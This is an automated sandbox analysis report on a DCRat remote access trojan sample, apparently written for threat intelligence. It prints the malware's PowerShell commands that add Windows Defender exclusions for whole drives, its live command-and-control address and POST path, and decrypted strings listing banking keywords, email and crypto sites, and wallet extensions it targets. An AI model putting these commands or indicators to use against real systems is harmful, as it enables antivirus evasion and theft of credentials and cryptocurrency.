Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CPNSQusnwC.exe

Overview

General Information

Sample name:CPNSQusnwC.exe
renamed because original name is a hash value
Original sample name:A26ED7DC21BC77F20C0251FA25738D02.exe
Analysis ID:1574710
MD5:a26ed7dc21bc77f20c0251fa25738d02
SHA1:8fc82929941d67a20c76976e796feab701795c2f
SHA256:18e83d9fabe142a751c644f12d223e6c4825912573a352551361abde977d753f
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • CPNSQusnwC.exe (PID: 1416 cmdline: "C:\Users\user\Desktop\CPNSQusnwC.exe" MD5: A26ED7DC21BC77F20C0251FA25738D02)
    • powershell.exe (PID: 2820 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5044 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5820 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4364 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5280 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4780 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1540 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4832 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1672 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3604 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7608 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7652 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7668 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • explorer.exe (PID: 8088 cmdline: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" MD5: A26ED7DC21BC77F20C0251FA25738D02)
        • powershell.exe (PID: 764 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1416 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3976 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7856 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7672 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5612 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7644 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7732 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6872 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
CPNSQusnwC.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Recovery\conhost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Recovery\conhost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                Process Memory Space: CPNSQusnwC.exe PID: 1416JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.CPNSQusnwC.exe.9d0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Execution from Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , ProcessId: 8088, ProcessName: explorer.exe
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\CPNSQusnwC.exe, ProcessId: 1416, TargetFilename: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CPNSQusnwC.exe", ParentImage: C:\Users\user\Desktop\CPNSQusnwC.exe, ParentProcessId: 1416, ParentProcessName: CPNSQusnwC.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 2820, ProcessName: powershell.exe
                    Sigma detected: Suspicious Program Location with Network Connections
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.88.91.89, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Initiated: true, ProcessId: 8088, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49753
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , ProcessId: 8088, ProcessName: explorer.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CPNSQusnwC.exe", ParentImage: C:\Users\user\Desktop\CPNSQusnwC.exe, ParentProcessId: 1416, ParentProcessName: CPNSQusnwC.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 2820, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CPNSQusnwC.exe", ParentImage: C:\Users\user\Desktop\CPNSQusnwC.exe, ParentProcessId: 1416, ParentProcessName: CPNSQusnwC.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 2820, ProcessName: powershell.exe
                    Sigma detected: Proxy Execution Via Explorer.exe
                    Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , ProcessId: 8088, ProcessName: explorer.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T14:32:37.532082+010020480951A Network Trojan was detected192.168.2.64975345.88.91.8980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: CPNSQusnwC.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: C:\Recovery\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: C:\Recovery\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                    Found malware configuration
                    Source: CPNSQusnwC.exeMalware Configuration Extractor: DCRat {"C2 url": "http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeReversingLabs: Detection: 76%
                    Source: C:\Recovery\conhost.exeReversingLabs: Detection: 76%
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeReversingLabs: Detection: 76%
                    Source: C:\Users\Public\Desktop\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\conhost.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\AxLDtRxd.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\DiqTAfIW.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\ELylTcFa.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\FBkUkkGT.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\FZhLDyOY.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\FnPmnTXV.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\GWITZydS.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\HzZUtpuN.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\QhesqMaw.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\SSKIxalp.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\TmvagkQx.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\bvfQbQIf.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\eJSyBaRc.logReversingLabs: Detection: 15%
                    Source: C:\Users\user\Desktop\fJbhCUkS.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\gljzVSiX.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\nTDOpObA.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\pxxplmMK.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\qVqwKxgw.logReversingLabs: Detection: 37%
                    Source: C:\Users\user\Desktop\sUqvPban.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\scaNtKAs.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\ufMwPuFo.logReversingLabs: Detection: 37%
                    Source: C:\Users\user\Desktop\vEieQmso.logReversingLabs: Detection: 15%
                    Source: C:\Users\user\Desktop\wdeWzfMx.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\zJHvHEBf.logReversingLabs: Detection: 25%
                    Multi AV Scanner detection for submitted file
                    Source: CPNSQusnwC.exeReversingLabs: Detection: 76%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\conhost.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\conhost.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: CPNSQusnwC.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: CPNSQusnwC.exeString decryptor: {"0":[],"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account;payment;login;card;stripe;transfer;funds","_1":"1500","_2":"15","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;discord.com;outlook.com;roblox.com;coinbase.com;binance.com","_1":"mail.google.com;discord.com;outlook.com;roblox.com;coinbase.com;binance.com"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive","_1":""}}
                    Source: CPNSQusnwC.exeString decryptor: ["0627azsrrpmLzhaIO2sR04eNcJgAmrixoHoX1ShldxYimEoL7IzWu6l6bpeRSrF9Hzhr3CR6VGyDf6kYeVDd1MCrgr6LxQTvsYbxg7R412BoIiafEFw7olH5wzKLGFJE","5f4504307f363e68f0558d6ac524302b9a3972a38384428f8af4023ee520bec9","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmxlVWwzU1dwdmFXVXhUbHBWTVZKR1ZGVlNVMU5XV2tabVV6bFdZekpXZVdONU9HbE1RMGw0U1dwdmFWcHRSbk5qTWxWcFRFTkplVWxxYjJsYWJVWnpZekpWYVV4RFNYcEphbTlwWkVoS01WcFRTWE5KYWxGcFQybEtNR051Vm14SmFYZHBUbE5KTmtsdVVubGtWMVZwVEVOSk1rbHFiMmxrU0VveFdsTkpjMGxxWTJsUGFVb3dZMjVXYkVscGQybFBRMGsyU1c1U2VXUlhWV2xNUTBrMVNXcHZhV1JJU2pGYVUwbHpTV3BGZDBscWIybGtTRW94V2xOSmMwbHFSWGhKYW05cFpFaEtNVnBUU1hOSmFrVjVTV3B2YVdSSVNqRmFVMGx6U1dwRmVrbHFiMmxrU0VveFdsTkpjMGxxUlRCSmFtOXBaRWhLTVZwVFNqa2lYUT09Il0="]
                    Source: CPNSQusnwC.exeString decryptor: [["http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/","linePacketprocessorauthSqlBasewindowsWordpressTemporary"]]
                    Source: CPNSQusnwC.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: CPNSQusnwC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 4x nop then jmp 00007FFD343DDFC6h0_2_00007FFD343DDDAD

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49753 -> 45.88.91.89:80
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeNetwork Connect: 45.88.91.89 80
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 344Expect: 100-continueConnection: Keep-Alive
